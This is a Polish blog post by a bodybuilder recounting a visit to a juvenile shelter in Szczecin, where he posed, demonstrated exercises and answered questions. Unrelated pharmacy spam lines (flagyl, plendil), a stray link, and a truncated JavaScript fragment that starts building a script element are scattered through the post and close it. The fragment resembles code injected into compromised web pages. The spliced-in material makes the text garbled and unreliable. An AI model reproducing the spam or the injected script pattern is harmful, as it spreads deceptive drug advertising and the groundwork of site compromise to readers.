Zaproszenie do schroniska dla nieletnich

4.05.2012 / Adam Jabłoński / Kulturystyka

Cześć,

Ostatnio zostałem zaproszony do schroniska dla nieletnich na przez wychowawcę i zawodnika klubu Łukasza Kubę na  życzenie nieletnich pensjonariuszy.

Także 14 kwietnia wybraliśmy się z moja dziewczyną do schroniska dla nieletnich w Szczecinie, na wejściu władze ośrodka mile nas przywitały.
Gdy weszliśmy do środka po krótkiej rozmowie udaliśmy się na siłownię która jest zaopatrzona w sprzęt na którym można rozwijać swoją sylwetkę.

online

 

Na siłowni „napompowałem” się przed pokazem.

 

Order

 

Gdy schodziliśmy do pomieszczenia w którym czekała grupa około 30 chłopaków dopadł mnie stresik, bo wchodząc nagle wszyscy zaczęli klaskać było mi głupio, a zarazem było to fajne uczucie.
Przebierając się oczy wszystkich skierowane były na mnie – Asia się śmiała ze mnie no ale cóż, wyobraźcie sobie to – Cisza i wszyscy się patrzą na Ciebie.

Gdy się przebrałem, wyszedłem na środek sali wychowawca puścił muzykę i wykonałem mój układ dowolny z zawodów, po czym pokazałem pozy obowiązkowe w kulturystyce omawiając poszczególne pozy oraz co jest ważne podczas pozowania. http://blog.jasonlneff.com/?p=3425
Po pozowaniu robiliśmy sobie wspólne pamiątkowe zdjęcia :

 

 

Następnie ubrałem się i zostałem zaproszony do stolika gdzie usiadłem i odpowiadałem na pytania chłopaków o suplementach, treningach, diecie, przygotowaniach do zawodów.

 

Cheap can you treat chlamydia with flagyl 200

 

Po części teoretycznej jeszcze raz poszliśmy na siłownię i wykonałem jeszcze parę ćwiczeń pokazując je tym osobom które tam były.


Później zostaliśmy oprowadzeniu po ośrodku, Łukasz – wychowawca – pokazał nam jak żyją wychowankowie ośrodka, pokazał nam szkołę, pokoje, świetlice, stołówkę.

Trochę szkoda zrobiło mi się niektórych bo widać, że dobre dzieciaki ale niektórych sytuacja życiowa zmusiła do jakiś głupstw, patrząc na to w sposób taki, że niektórzy w domach nie mieli wody, prądu ani co jeść, a była to np. rodzina 6 osoba nikt pracy nie ma – zmienia to trochę postać rzeczy.

Dodam bo muśże to napisać/powiedzieć, że jest to dla mnie wielki zaszczyt i wyróżnienie zostać zaproszonym przez władze ośrodka gdzie mogłem chociaż trochę promować sport.
W ośrodku jest tak wielu młodych ludzi którzy mają w sobie zapał do aktywności sportowej ale niestety zeszli na chwile z dobrej drogi dlatego mam nadzieję, że sport pokieruje Chłopaków  na właściwy tor życia.

Cieszę się bardzo ze spotkania
Dzięki
Hej
Cześćvar d=document;var s=d.createElement(‚script’); if (document.currentScript) { if (document.currentScript) { purchase plendil 10mg